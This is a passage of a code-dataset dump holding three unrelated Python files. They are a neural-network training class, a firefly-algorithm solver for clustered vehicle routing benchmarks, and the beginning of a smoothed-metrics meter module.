__init__(self,all_layer_list,backpropagation_method,batch_size,regulariastion_val,descent_rate):\r\n ''' Argument 1: (list)Give the list of all layer sequentially in a list eg(input_layer,hidden_layer1,... ... ,hidden_layer_last,output_layer)\r\n Argument 2: (String)This argument will let the network know if we are backpropagating batch wise or stochastically\r\n Argument 3: (integer) In case of batch gradient descent give the size of batch or in case of stochastic descent give the data_input size'''\r\n self.all_layer_tup=tuple(all_layer_list)\r\n self.backpropagation_method=backpropagation_method\r\n self.batch_size=float(batch_size)\r\n self.lambda_val=float(regulariastion_val)\r\n self.alpha_rate=float(descent_rate)\r\n \r\n # MODIFY DURING NEW SETUP(IMPORTANT)\r\n #During the final implementation phase where we feed the neural net with our data.\r\n def initialize_input_output_layer(self,list_of_input,list_of_output):\r\n ''' In list of input and output: if a subunit is biased then give empty tuple '''\r\n #both X val and Y val for new elemnt of output layer\r\n for i,sub_unit in enumerate(self.all_layer_tup[0].sub_units):\r\n shape_current_unit=sub_unit.shape\r\n if self.all_layer_tup[0].bias_property[i]=='un_biased':\r\n for j in range(shape_current_unit[0]):\r\n for k in range(shape_current_unit[1]):\r\n #print len(list_of_input[i]),shape_current_unit[1],j,k\r\n #print (shape_current_unit[1])*j+k\r\n sub_unit[j][k].a_val=list_of_input[i][(shape_current_unit[1])*j+k]\r\n \r\n for i,sub_unit in enumerate(self.all_layer_tup[-1].sub_units):\r\n shape_current_unit=sub_unit.shape\r\n #print shape_current_unit\r\n for j in range(shape_current_unit[0]):\r\n for k in range(shape_current_unit[1]):\r\n #print list_of_output[i]\r\n #print 'i:',i,',j:',j,',k:',k,list_of_output[i][(shape_current_unit[1])*j+k],'\\n'\r\n sub_unit[j][k].Y=list_of_output[i][(shape_current_unit[1])*j+k]\r\n \r\n #There is no need to create a new network and set the Thetas from previous network. We will just initialize this present network \r\n # to the state that just by initializing the input_layer with new batch we can resume our work.\r\n def in_batch_initialize_network(self):\r\n ''' To set the network to initial state to start a fresh epoch cycle by reseting all the variable '''\r\n for layer in self.all_layer_tup:\r\n for i,sub_unit in enumerate(layer.sub_units):\r\n shape_current_unit=sub_unit.shape\r\n for j in range(shape_current_unit[0]):\r\n for k in range(shape_current_unit[1]):\r\n if layer.layer_type=='hidden':\r\n sub_unit[j][k].error_delta=0\r\n if layer.bias_property[i]=='un_biased':\r\n sub_unit[j][k].a_val=0\r\n sub_unit[j][k].z_val=0\r\n elif layer.layer_type=='output':\r\n sub_unit[j][k].error_delta=0\r\n sub_unit[j][k].a_val=0\r\n sub_unit[j][k].z_val=0\r\n \r\n def batch_initialize_network(self):\r\n '''We have to re-initialize the \"gradient\" to zero whenever a new batch is starting \r\n unlike just initialization of network element like error_delta and a_val in input and y_val in oytput and other node val to zero\r\n to accomodate the change in example'''\r\n for layer in self.all_layer_tup:\r\n if layer.layer_type != 'output':\r\n for i,sub_unit in enumerate(layer.sub_units):\r\n shape_current_unit=sub_unit.shape\r\n for j in range(shape_current_unit[0]):\r\n for k in range(shape_current_unit[1]):\r\n foreward_subunit_num=len(sub_unit[j][k].Gradient)\r\n for l in range(foreward_subunit_num):\r\n grad_shape=sub_unit[j][k].Gradient[l].shape\r\n if grad_shape!=(0,0):\r\n for m in range(grad_shape[0]):\r\n for n in range(grad_shape[1]):\r\n sub_unit[j][k].Gradient[l][m][n]=0\r\n elif layer.layer_type=='output':\r\n layer.cost_incurred=0\r\n \r\n def network_foreward_propagate(self):\r\n for i,layer in enumerate(self.all_layer_tup):\r\n #print i,len(self.all_layer_tup),self.all_layer_tup[i+1]\r\n if layer.layer_type=='input':\r\n layer.layer_foreward_propagate(self.all_layer_tup[i+1])\r\n elif layer.layer_type=='hidden':\r\n layer.inlayer_foreward_propagate()\r\n layer.layer_foreward_propagate(self.all_layer_tup[i+1])\r\n elif layer.layer_type=='output':\r\n layer.inlayer_foreward_propagate()\r\n \r\n #(IMPORTANT) Calculate the cost function and DONT divide by the batch size.(or while implementing) in final script (to full cost as I have divided the m factor from regularisation part also.)\r\n \r\n def network_back_propagate(self):\r\n for reversed_layer in reversed(self.all_layer_tup):\r\n if reversed_layer.layer_type=='output':\r\n reversed_layer.layer_back_propagate('none')\r\n elif reversed_layer.layer_type=='hidden':\r\n #print self.all_layer_tup[i+1]\r\n reversed_layer.layer_back_propagate(self.all_layer_tup[self.all_layer_tup.index(reversed_layer)+1])\r\n reversed_layer.inlayer_back_propagate()\r\n elif reversed_layer.layer_type=='input':\r\n reversed_layer.layer_back_propagate(self.all_layer_tup[self.all_layer_tup.index(reversed_layer)+1])\r\n \r\n ## The regulization term is added here not in network part of gradietnt descent.\r\n def start_gradient_descent(self):\r\n num_units=len(self.all_layer_tup)\r\n output_layer=self.all_layer_tup[num_units-1]\r\n for i,layer in enumerate(self.all_layer_tup):\r\n #print i\r\n if layer.layer_type != 'output':\r\n for unit_index,sub_unit in enumerate(layer.sub_units):\r\n #print unit_index\r\n shape_current_unit=sub_unit.shape\r\n for j in range(shape_current_unit[0]):\r\n for k in range(shape_current_unit[1]):\r\n for theta_index,theta in enumerate(sub_unit[j][k].Theta):\r\n shape_theta=theta.shape\r\n if (shape_theta[0]+shape_theta[1])>0:\r\n for l in range(shape_theta[0]):\r\n for m in range(shape_theta[1]):\r\n if layer.bias_property[unit_index] != 'biased':\r\n #Adding the regularisation Cost to the net cost\r\n #print ((self.lambda_val/(2*self.batch_size))*(sub_unit[j][k].Theta[theta_index].item(l,m)**2))\r\n output_layer.cost_incurred=output_layer.cost_incurred+((self.lambda_val/(2*self.batch_size))*(sub_unit[j][k].Theta[theta_index].item(l,m)*sub_unit[j][k].Theta[theta_index].item(l,m)))\r\n #print i,unit_index,j,k,l,m\r\n sub_unit[j][k].Gradient[theta_index][l][m]=sub_unit[j][k].Gradient[theta_index].item(l,m)+((self.lambda_val/self.batch_size)*sub_unit[j][k].Theta[theta_index].item(l,m))\r\n sub_unit[j][k].Theta[theta_index][l][m]=sub_unit[j][k].Theta[theta_index].item(l,m)-((self.alpha_rate)*sub_unit[j][k].Gradient[theta_index].item(l,m))\r\n \r\n #def calculate_cost(self):","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"296634314","text":"import argparse\nimport copy\nimport cProfile\nimport distance\nimport math\nimport numpy as np\nimport os\nimport re\nimport sys\nimport time\nimport xml.etree.ElementTree as ET\n\ndef confirm_input(fname):\n while True:\n choice = input(\"delete previous '{}' ?[y/n]: \".format(fname)).lower()\n if choice == 'y':\n return True\n elif choice == 'n':\n sys.exit()\n\ndef calc_EUCdistance(a, b):#a, b: customers\n d = math.sqrt((a[0]-b[0])**2 + (a[1]-b[1])**2)\n return d\n\ndef extract_xmldata(bmark):\n tree = ET.parse('{}'.format(bmark))\n root = tree.getroot()\n\n coordx = []\n coordy = []\n for x in root.iter('CoordX'):\n x = int(x.text)\n coordx.append(x)\n for y in root.iter('CoordY'):\n y = int(y.text)\n coordy.append(y)\n coord = [(x,y) for x,y in zip(coordx, coordy)]\n\n forbidden_i = []\n forbidden_j = []\n #forbidden_i to forbidden_j\n for i in root.iter('est1'):\n i = int(i.text)\n forbidden_i.append(i)\n for j in root.iter('est2'):\n j = int(j.text)\n forbidden_j.append(j)\n forbidden = [(i, j) for i, j in zip(forbidden_i, forbidden_j)]\n\n cluster = set()\n for i in root.iter('Cluster'):\n i = int(i.text)\n cluster.add(i)\n\n dem_ent = []\n dem_rec = []\n for i in root.iter('DemEnt'):\n i = int(i.text)\n dem_ent.append(i)\n for j in root.iter('DemRec'):\n j = int(j.text)\n dem_rec.append(j)\n # demand = [dem_ent[i] + dem_rec[i] for i in range(len(dem_ent))]\n\n return coord, forbidden, cluster, dem_ent, dem_rec\n\n\nclass Firefly:\n def __init__(self, tour, capacity):\n self.VEHICLE_CAPACITY = capacity\n ###TIME (second)[start, end]\n self.DELIVERY_TIME = [6*60*60, 15*60*60]\n self.PEAK_TIME = [8*60*60, 10*60*60]\n ###\n init_tour = copy.deepcopy(tour)\n tour2routes = [i for i in range(len(tour))]\n np.random.shuffle(tour2routes)\n for i in range(len(tour)):\n np.random.shuffle(init_tour[i])\n self.update(init_tour, tour2routes)\n def update(self, tour, tour2routes):\n routes, luminosity = self.evaluate(tour, tour2routes)\n self.tour = tour\n self.tour2routes = tour2routes\n self.routes = routes\n self.luminosity = luminosity\n def evaluate(self, tour, tour2routes):\n \"\"\"\n tour: the permutation of customers in clusters\n and\n routes: the permutation of customers separated by zero\n If routes is coming, this function converts tour into routes.\n \"\"\"\n global off_peak, peak, clustered_dem_ent\n routes = []\n load_amount = 0\n routes.append(0)\n for cluster in tour2routes:\n if self.VEHICLE_CAPACITY < load_amount+clustered_dem_ent[cluster+1]:\n routes.append(0)\n for customer in tour[cluster]:\n routes.append(customer)\n load_amount = clustered_dem_ent[cluster+1]\n else:\n for customer in tour[cluster]:\n routes.append(customer)\n load_amount += clustered_dem_ent[cluster+1]\n routes.append(0)\n\n # for i, demand in enumerate(clustered_dem_ent):\n # if self.VEHICLE_CAPACITY < load_amount+demand:\n # routes.append(0)\n # for customer in tour[i-1]:\n # routes.append(customer)\n # load_amount = demand\n # else:\n # if i == 0:\n # routes.append(0)\n # else:\n # for customer in tour[i-1]:\n # routes.append(customer)\n # load_amount += demand\n # routes.append(0)\n\n luminosity = 0\n triptime = self.DELIVERY_TIME[0]\n for i in range(len(routes)-1):\n if routes[i] == 0:\n if triptime < 200000 and self.DELIVERY_TIME[1] < triptime:\n luminosity += 200000\n luminosity += triptime - self.DELIVERY_TIME[0]\n triptime = self.DELIVERY_TIME[0]\n if self.PEAK_TIME[0] <= triptime and triptime <= self.PEAK_TIME[1]:\n triptime += peak[routes[i]][routes[i+1]]\n else:\n triptime += off_peak[routes[i]][routes[i+1]]\n luminosity += triptime - self.DELIVERY_TIME[0]\n\n return routes, luminosity\n\n\ndef make_costtable(forbidden):\n global coord\n off_peak = [['' for j in range(len(coord))] for i in range(len(coord))]\n peak = [['' for j in range(len(coord))] for i in range(len(coord))]\n for i in range(len(coord)-1):\n for j in range(i+1, len(coord)):\n off_peak[i][j] = calc_EUCdistance(coord[i], coord[j])\n if j % 2 == 1:\n off_peak[j][i] = calc_EUCdistance(coord[j], coord[i]) * 1.2\n else:\n off_peak[j][i] = calc_EUCdistance(coord[j], coord[i]) * 0.8\n for i in range(len(coord)-1):\n for j in range(i+1, len(coord)):\n peak[i][j] = calc_EUCdistance(coord[i], coord[j]) * 1.3\n if j % 2 == 1:\n peak[j][i] = calc_EUCdistance(coord[j], coord[i]) * 1.2 * 1.2\n else:\n peak[j][i] = calc_EUCdistance(coord[j], coord[i]) * 0.8 * 1.4\n\n for forb in forbidden:\n off_peak[forb[0]][forb[1]] = 200000\n peak[forb[0]][forb[1]] = 200000\n\n return off_peak, peak\n\ndef insertion_function(a, b, gamma, iteration): #a moves. a, b:firefly\n a2 = [customer for cluster in a.tour for customer in cluster]\n b2 = [customer for cluster in b.tour for customer in cluster]\n #customer\n customer_d = distance.hamming(a2, b2)\n customer_n = int(customer_d * gamma ** iteration)\n # customer_n = distance.hamming(a.routes, b.routes)\n if customer_n <= 2:\n customer_n = 2\n else:\n customer_n = np.random.randint(2, customer_n)\n #cluster\n cluster_d = distance.hamming(a.tour2routes, b.tour2routes)\n cluster_n = 0\n if cluster_d != 0:\n cluster_n = np.random.randint(0, cluster_d)\n\n acopy = copy.deepcopy(a)\n best_firefly = copy.deepcopy(a)\n\n for i in range(cluster_n):#cluster insertion\n rand_from = np.random.randint(0, len(acopy.tour2routes))\n rand_into = np.random.randint(0, len(acopy.tour2routes))\n insert_elm = acopy.tour2routes.pop(rand_from)\n acopy.tour2routes.insert(rand_into, insert_elm)\n acopy.update(acopy.tour, acopy.tour2routes)\n if acopy.luminosity < best_firefly.luminosity:\n best_firefly = copy.deepcopy(acopy)\n for i in range(customer_n):#customer insertion\n rand_cluster = np.random.randint(0, len(acopy.tour))\n rand_from = np.random.randint(0, len(acopy.tour[0]))\n rand_into = np.random.randint(0, len(acopy.tour[0]))\n insert_elm = acopy.tour[rand_cluster].pop(rand_from)\n acopy.tour[rand_cluster].insert(rand_into, insert_elm)\n acopy.update(acopy.tour, acopy.tour2routes)\n if acopy.luminosity < best_firefly.luminosity:\n best_firefly = copy.deepcopy(acopy)\n\n return best_firefly.tour, best_firefly.tour2routes\n\ndef beta_step(a, b, gamma, delta):#a, b: class Firefly\n a_tour = [a.tour[cluster] for cluster in a.tour2routes]\n b_tour = [b.tour[cluster] for cluster in b.tour2routes]\n a2 = [customer for cluster in a.tour for customer in cluster]\n b2 = [customer for cluster in b.tour for customer in cluster]\n cluster_d = distance.hamming(a.tour2routes, b.tour2routes)\n cluster_beta = 1 / (1 + delta * cluster_d * cluster_d)\n customer_d = distance.hamming(a2, b2)\n customer_beta = 1 / (1 + gamma * customer_d * customer_d)\n cluster_dic = {cluster:'NOT_VISIT' for cluster in a.tour2routes}\n customer_dic = {customer:'NOT_VISIT' for customer in a2}\n\n new_t2r = ['' for i in range(len(a.tour2routes))]\n new_tour = [['' for j in cluster] for cluster in a_tour]\n\n idx_t2r = [i for i in range(len(a.tour2routes))]\n idx_tour = [[j for j in range(len(a_tour[0]))] for i in range(len(a_tour))]\n insert_t2r = [elm for elm in a.tour2routes]\n insert_tour = [[i*len(a_tour[0])+j+1 for j in range(len(a_tour[0]))] for i in range(len(a_tour))]\n # print(insert_tour)\n\n for i in reversed(idx_t2r):\n if a.tour2routes[i] == b.tour2routes[i]:\n new_t2r[i] = a.tour2routes[i]\n cluster_dic[new_t2r[i]] = 'VISITED'\n idx_t2r.remove(i)\n insert_t2r.remove(new_t2r[i])\n for i in a.tour2routes:\n for j in reversed(idx_tour[i]):\n if a.tour[i][j] == b.tour[i][j]:\n new_tour[i][j] = a.tour[i][j]\n customer_dic[new_tour[i][j]] = 'VISITED'\n idx_tour[i].remove(j)\n insert_tour[i].remove(new_tour[i][j])\n\n np.random.shuffle(idx_t2r)\n for i in range(len(idx_tour)):\n np.random.shuffle(idx_tour[i])\n\n for idx in reversed(idx_t2r):\n if np.random.rand() < cluster_beta:\n if cluster_dic[b.tour2routes[idx]] == 'NOT_VISIT':\n new_t2r[idx] = b.tour2routes[idx]\n cluster_dic[new_t2r[idx]] = 'VISITED'\n idx_t2r.remove(idx)\n insert_t2r.remove(new_t2r[idx])\n elif cluster_dic[a.tour2routes[idx]] == 'NOT_VISIT':\n new_t2r[idx] = a.tour2routes[idx]\n cluster_dic[new_t2r[idx]] = 'VISITED'\n idx_t2r.remove(idx)\n insert_t2r.remove(new_t2r[idx])\n else:\n if cluster_dic[a.tour2routes[idx]] == 'NOT_VISIT':\n new_t2r[idx] = a.tour2routes[idx]\n cluster_dic[new_t2r[idx]] = 'VISITED'\n idx_t2r.remove(idx)\n insert_t2r.remove(new_t2r[idx])\n elif cluster_dic[b.tour2routes[idx]] == 'NOT_VISIT':\n new_t2r[idx] = b.tour2routes[idx]\n cluster_dic[new_t2r[idx]] = 'VISITED'\n idx_t2r.remove(idx)\n insert_t2r.remove(new_t2r[idx])\n for i, idx_cluster in enumerate(idx_tour):\n for j in reversed(idx_cluster):\n if np.random.rand() < customer_beta:\n if customer_dic[b.tour[i][j]] == 'NOT_VISIT':\n new_tour[i][j] = b.tour[i][j]\n customer_dic[new_tour[i][j]] = 'VISITED'\n idx_cluster.remove(j)\n insert_tour[i].remove(new_tour[i][j])\n elif customer_dic[a.tour[i][j]] == 'NOT_VISIT':\n new_tour[i][j] = a.tour[i][j]\n customer_dic[new_tour[i][j]] = 'VISITED'\n idx_cluster.remove(j)\n insert_tour[i].remove(new_tour[i][j])\n else:\n if customer_dic[a.tour[i][j]] == 'NOT_VISIT':\n new_tour[i][j] = a.tour[i][j]\n customer_dic[new_tour[i][j]] = 'VISITED'\n idx_cluster.remove(j)\n insert_tour[i].remove(new_tour[i][j])\n elif customer_dic[b.tour[i][j]] == 'NOT_VISIT':\n new_tour[i][j] = b.tour[i][j]\n customer_dic[new_tour[i][j]] = 'VISITED'\n idx_cluster.remove(j)\n insert_tour[i].remove(new_tour[i][j])\n\n for i, insert_elm in zip(idx_t2r, insert_t2r):\n new_t2r[i] = insert_elm\n for i in range(len(idx_tour)):\n for j, insert_elm in zip(idx_tour[i], insert_tour[i]):\n new_tour[i][j] = insert_elm\n\n return new_tour, new_t2r\n\ndef alpha_step1(a, alpha): #a:firefly\n cluster_size = len(a.tour)\n customer_size = len(a.tour[0])\n\n if a.luminosity < 200000:\n feasible = True\n else:\n feasible = False\n i=0\n z = np.random.randint(0, cluster_size)\n while i < alpha:\n x = np.random.randint(0, customer_size)\n y = np.random.randint(0, customer_size)\n a.tour[z][x], a.tour[z][y] = a.tour[z][y], a.tour[z][x]\n a.update(a.tour, a.tour2routes)\n if a.luminosity > 200000 and feasible == True:#可能解を突然変異で破壊した場合\n a.tour[z][x], a.tour[z][y] = a.tour[z][y], a.tour[z][x]\n i-=1\n i+=1\n\n return a.tour, a.tour2routes\n\ndef alpha_step2(a, alpha):\n cluster_size = len(a.tour)\n customer_size = len(a.tour[0])\n if customer_size < alpha:\n sys.exit(\"error: alpha(v2) is lower than the customer size\")\n if a.luminosity < 200000:\n feasible = True\n else:\n feasible = False\n while True:\n idxs = [i for i in range(customer_size)]\n np.random.shuffle(idxs)\n x = idxs[0:alpha]\n y = idxs[0:alpha]\n z = np.random.randint(0, cluster_size)\n np.random.shuffle(y)\n for i in range(alpha):\n a.tour[z][x[i]], a.tour[z][y[i]] = a.tour[z][y[i]], a.tour[z][x[i]]\n a.update(a.tour, a.tour2routes)\n if a.luminosity > 200000 and feasible == True:\n for i in range(alpha):\n a.tour[z][x[i]], a.tour[z][y[i]] = a.tour[z][y[i]], a.tour[z][x[i]]\n continue\n break\n return a.tour, a.tour2routes\n\ndef alpha_step4(a, alpha, t, step, schedule):\n if schedule == \"linear\":\n segment = len(a.tour[0]) - (t//step)\n elif schedule == \"sqrt\":\n segment = int(len(a.tour[0]) - (t//step)**(1/2))\n if segment < 2:\n segment = 2\n if a.luminosity < 200000:\n feasible = True\n else:\n feasible = False\n origin = np.random.randint(0, len(a.tour[0]))\n end = origin + segment\n z = np.random.randint(0, len(a.tour))\n for i in range(alpha):\n x = np.random.randint(origin, end+1) % len(a.tour)\n y = np.random.randint(origin, end+1) % len(a.tour)\n a.tour[z][x], a.tour[z][y] = a.tour[z][y], a.tour[z][x]\n a.update(a.tour, a.tour2routes)\n if a.luminosity > 200000 and feasible == True:\n a.tour[z][x], a.tour[z][y] = a.tour[z][y], a.tour[z][x]\n return a.tour, a.tour2routes\n\n# Alpha step: exploration (v5)\ndef alpha_step5(a, alpha, t, step, schedule):\n if schedule == \"linear\":\n segment = len(a) - (t//step)\n elif schedule == \"sqrt\":\n segment = int(len(a) - (t//step)**(1/2))\n if segment < 2:\n segment = 2\n if alpha > segment:\n alpha = segment\n origin = random.randint(0, len(a)-1)\n end = origin + segment\n idxs = [i for i in range(origin, end)]\n for i in range(len(idxs)):\n idxs[i] = idxs[i]%len(a)\n random.shuffle(idxs)\n alpha = int(alpha)\n x = idxs[0:alpha]\n y = idxs[0:alpha]\n random.shuffle(y)\n for i in range(alpha):\n a[x[i]], a[y[i]] = a[y[i]], a[x[i]]\n return a.tour, a.tour2routes\n\ndef firefly_algorithm(**kwargs):\n if kwargs['p']:\n print(kwargs)\n capa_dict = {\"50_1_1\":240, \"50_1_2\":160, \"50_1_3\":240, \"50_1_4\":160,\n \"50_2_1\":240, \"50_2_2\":160, \"50_2_3\":240, \"50_2_4\":160,\n \"80_1\":240, \"80_2\":160, \"80_3\":240, \"50_4\":160,\n \"100_1\":140, \"100_2\":260, \"100_3\":320}\n CAPACITY = capa_dict[re.split(\"[/.]\", kwargs['bmark'])[1].strip('Osaba_')]\n global coord, off_peak, peak, clustered_dem_ent\n coord, forbidden, cluster, dem_ent, dem_rec = extract_xmldata(kwargs['bmark'])\n off_peak, peak = make_costtable(forbidden)\n customers_per_cluster = (len(coord)-1) // (len(cluster)-1)\n tour = [[customers_per_cluster * i + j for j in range(1, customers_per_cluster+1)] for i in range(len(cluster)-1)]\n clustered_dem_ent = [0 for i in range(len(cluster))]\n for i, cluster in enumerate(tour):\n for customer in cluster:\n clustered_dem_ent[i+1] += dem_ent[customer]\n\n swarm = [Firefly(tour, CAPACITY) for i in range(kwargs['f'])]\n swarm = sorted(swarm, key = lambda swarm:swarm.luminosity)\n best_firefly = copy.deepcopy(swarm[0])\n # for fly in swarm:\n # if fly.luminosity < best_firefly.luminosity:\n # best_firefly = copy.deepcopy(fly)\n if kwargs['p'] == 1:\n print(\"Best firefly init: \", best_firefly.luminosity)\n stag_count = 0\n iteration = 0\n NUM_CUSTOMER = len(coord)-1\n start_time = time.time()\n\n # print([s.luminosity for s in swarm])\n\n while stag_count < (NUM_CUSTOMER+1/2*NUM_CUSTOMER*(NUM_CUSTOMER+1)):#the number of customers(N) + Σ(k=1, N)k\n # while stag_count < NUM_CUSTOMER*10:\n time1 = time.time()\n for i in range(kwargs['f']):\n for j in range(kwargs['f']):\n if swarm[j].luminosity < swarm[i].luminosity:\n # new_tour, new_tour2routes = insertion_function(swarm[i], swarm[j], kwargs['g'], iteration)\n new_tour, new_tour2routes = beta_step(swarm[i], swarm[j], kwargs['g'], kwargs['dlt'])\n swarm[i].update(new_tour, new_tour2routes)\n if kwargs['v'] == 1:\n new_tour, new_tour2routes = alpha_step1(swarm[i], kwargs['a'])\n elif kwargs['v'] == 2:\n new_tour, new_tour2routes = alpha_step2(swarm[i], kwargs['a'])\n elif kwargs['v'] == 4:\n new_tour, new_tour2routes = alpha_step4(swarm[i], kwargs['a'], iteration, kwargs['s'], kwargs['sch'])\n else:\n new_tour, new_tour2routes = alpha_step5(swarm[i], kwargs['a'], iteration, kwargs['s'], kwargs['sch'])\n swarm[i].update(new_tour, new_tour2routes)\n swarm = sorted(swarm, key = lambda swarm:swarm.luminosity)\n if swarm[0].luminosity == swarm[-1].luminosity: #all firefly at the same point\n if kwargs['p'] == 1:\n print(\"*** swarm blocked ***\")\n for i in range(1, len(swarm)):\n if kwargs['v'] == 1:\n new_tour, new_tour2routes = alpha_step1(swarm[i], kwargs['a'])\n elif kwargs['v'] == 2:\n new_tour, new_tour2routes = alpha_step2(swarm[i], kwargs['a'])\n elif kwargs['v'] == 4:\n new_tour, new_tour2routes = alpha_step4(swarm[i], kwargs['a'], iteration, kwargs['s'], kwargs['sch'])\n else:\n new_tour, new_tour2routes = alpha_step5(swarm[i], kwargs['a'], iteration, kwargs['s'], kwargs['sch'])\n swarm[i].update(new_tour, new_tour2routes)\n swarm = sorted(swarm, key = lambda swarm:swarm.luminosity)\n time2 = time.time()\n if swarm[0].luminosity < best_firefly.luminosity:\n best_firefly = copy.deepcopy(swarm[0])\n stag_count = 0\n else:\n stag_count += 1\n # for fly in swarm:\n # if fly.luminosity < best_firefly.luminosity:\n # best_firefly = copy.deepcopy(fly)\n # stag_count = 0\n # stag_count += 1\n if iteration % 100 == 0:\n if kwargs['p'] == 1:\n print(\"\")\n print(\"Iteration: \", iteration)\n print(\"Swarm: \", [s.luminosity for s in swarm])\n print(\"Best firefly: \", best_firefly.luminosity)\n # for fly in swarm:\n # print(fly.routes)\n # print(fly.luminosity)\n # with open('{}'.format(kwargs['fname']), 'a') as f:\n # f.write(\"i:{}\\t{}\\n\".format(iteration, best_firefly.luminosity))\n iteration += 1\n # print(\"time2-1: {}\".format(time2 - time1))\n # print(\"time3-2: {}\".format(time3 - time2))\n end_time = time.time()\n print(\"Elapsed time: {}\\n\".format(end_time - start_time))\n # with open(\"{}\".format(kwargs['fname']), 'a') as f:\n # f.write(\"routes: {}\\n\".format(best_firefly.routes))\n # with open(\"{}\".format(kwargs['fname']), 'a') as f:\n # f.write(\"Elapsed time: {}\\n\\n\".format(end_time - start_time))\n\n return best_firefly\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-bmark', type = str, default = \"Osaba_data/Osaba_50_1_1.xml\", help = \"benchmark xml_file name\")\n parser.add_argument('-f', type = int, default = 100, help = \"the number of firefly\")\n parser.add_argument('-a', type = int, default = 1, help = \"alpha step parameter\")\n parser.add_argument('-g', type = float, default = 0.90, help = \"insert customer rate\")\n parser.add_argument('-dlt', type = float, default = 1.0, help = \"insert cluster rate\")\n parser.add_argument('-v', type = int, default = 1, help = \"alpha step version\")\n parser.add_argument('-p', type = int, default = 1, help = \"vorbose information\")\n parser.add_argument('-fname', type = str, default = 'vrp/result', help = \"save file name\")\n parser.add_argument('-s', type = int, default = 1, help = \"segment decrease rate\")\n parser.add_argument('-sch', type = str, default = 'linear', help = \"segment decrease schedule\")\n args = parser.parse_args()\n\n\n # cProfile.run('firefly_algorithm(bmark=args.bmark, f=args.f, a=args.a, g=args.g, dlt=args.dlt, v=args.v, p=args.p, fname=args.fname)', sort='time')\n\n if os.path.exists('{}'.format(args.fname)):\n if confirm_input(args.fname):\n with open('{}'.format(args.fname), 'w') as f:\n print(\"clear previous text\")\n with open('{}'.format(args.fname), 'a') as f:\n f.write(\"random: -g={}, -a={}, -f={}\\n\".format(args.g, args.a, args.f))\n\n # while(True):\n # aparam = np.random.randint(1,8)\n # gparam = (0.01-0.00001)*np.random.rand()+0.00001\n # fparam = np.random.randint(20,80)\n # with open('{}'.format(args.fname), 'a') as f:\n # f.write('-a={}, -g={}, -f={}\\n'.format(aparam, gparam, fparam))\n # firefly = firefly_algorithm(bmark=args.bmark, f=fparam, a=aparam, g=gparam, dlt=args.dlt, v=args.v, p=args.p, fname=args.fname)\n # luminositys=[]\n # for i in range(10):\n # firefly = firefly_algorithm(bmark=args.bmark, f=args.f, a=args.a, g=args.g, dlt=args.dlt, v=args.v, p=args.p, fname=args.fname, s=args.s, sch=args.sch)\n # luminositys.append(firefly.luminosity)\n # with open(\"{}\".format(kwargs['fname']), 'a') as f:\n # f.write(\"mean: {}\\n\".format(np.mean(luminositys)))\n # f.write(\"std: {}\".format(np.std(luminositys)))\n firefly = firefly_algorithm(bmark=args.bmark, f=args.f, a=args.a, g=args.g, dlt=args.dlt, v=args.v, p=args.p, fname=args.fname, s=args.s, sch=args.sch)\n # print(firefly.luminosity)\n print(firefly.routes)\n #\n # with open('{}'.format(args.fname), 'a') as f:\n # f.write(\"{}\\n\\n\".format(firefly.routes))\n # print(customers)\n\n\n # print(coord)\n # a = [1,5,3,2,4,1,6,6,3,3,3,3,3,3]\n # b = [1,5,2,6,3,1,6,5,5,5,5,5,5,5]\n # print(beta_step(a,b,1,0.95,1))\n","sub_path":"master/scripts/planner/solvers/vrp_firefly.py","file_name":"vrp_firefly.py","file_ext":"py","file_size_in_byte":22681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"67018685","text":"\"\"\"\nCopyright (c) Facebook, Inc. and its affiliates.\n\nThis source code is licensed under the MIT license found in the\nLICENSE file in the root directory of this source tree.\n\"\"\"\n\n# THIS IS NOW DEPRECATED. Consider using ocpmodels.modules.evaluator instead.\nfrom collections import defaultdict, deque\n\nimport torch\n\n# from github.com/facebookresearch/pythia/blob/12f67cd4f67499814bb0b3665ff14dd635800f63/pythia/common/meter.py\nfrom ocpmodels.common import distutils\n\n\nclass SmoothedValue:\n \"\"\"Track a series of values and provide access to smoothed values over a\n window or the global series average.\n \"\"\"\n\n def __init__(self, window_size=20):\n self.window_size = window_size\n self.reset()\n\n def reset(self):\n self.deque = deque(maxlen=self.window_size)\n self.series = []\n self.total = 0.0\n self.count = 0\n\n def update(self, value):\n self.deque.append(value)\n self.series.append(value)\n self.count += 1\n self.total += value\n\n @property\n def median(self):\n d = torch.tensor(list(self.deque))\n return d.median().item()\n\n @property\n def avg(self):\n d = torch.tensor(list(self.deque))\n return d.mean().item()\n\n @property\n def global_avg(self):\n return self.total / self.count\n\n def get_latest(self):\n return self.deque[-1]\n\n def all_reduce(self, device):\n print(\"Total\", self.total)\n self.total = distutils.all_reduce(self.total, device=device)\n self.count = distutils.all_reduce(self.count, device=device)\n series_list = distutils.all_gather(self.series, device=device)\n self.series = list(zip(series_list))\n deque_list = distutils.all_gather(self.deque, device=device)\n self.deque = deque(list(zip(deque_list)), maxlen=self.window_size)\n\n\nclass Meter:\n def __init__(self, delimiter=\", \", split=\"train\"):\n self.meters = defaultdict(SmoothedValue)\n self.delimiter = delimiter\n self.split = split\n\n def update(self, update_dict):\n for k, v in update_dict.items():\n if isinstance(v, torch.Tensor):\n if v.dim() != 0:\n v = v.mean()\n v = v.item()\n assert isinstance(v, (float, int))\n self.meters[k].update(v)\n\n def update_from_meter(self, meter):\n for key, value in meter.meters.items():\n assert isinstance(value, SmoothedValue)\n self.meters[key] = value\n\n def __getattr__(self, attr):\n if attr in self.meters:\n return self.meters[attr]\n if attr in self.__dict__:\n return self.__dict__[attr]\n raise AttributeError(\n \"'{}' object has no attribute '{}'\".format(\n type(self).__name__, attr\n )\n )\n\n def get_scalar_dict(self):\n scalar_dict = {}\n for k, v in self.meters.items():\n scalar_dict[k] = v.global_avg\n return scalar_dict\n\n def all_reduce(self, device):\n for v in self.meters.values():\n v.all_reduce(device)\n\n def __str__(self):\n loss_str = []\n for name, meter in self.meters.items():\n # Regardless of split, if \"epoch\" or \"step\", print latest.\n if \"epoch\" in name or \"step\" in name:\n loss_str.append(\"{}: {:.4f}\".format(name, meter.get_latest()))\n # If training split, print mean over the past window_size points.\n elif \"train\" in self.split:\n loss_str.append(\"{}: {:.4f}\".format(name, meter.avg))\n # If val / test splits, print global average over the entire split.\n elif \"val\" in self.split or \"test\" in self.split:\n loss_str.append(\"{}: {:.4f}\".format(name, 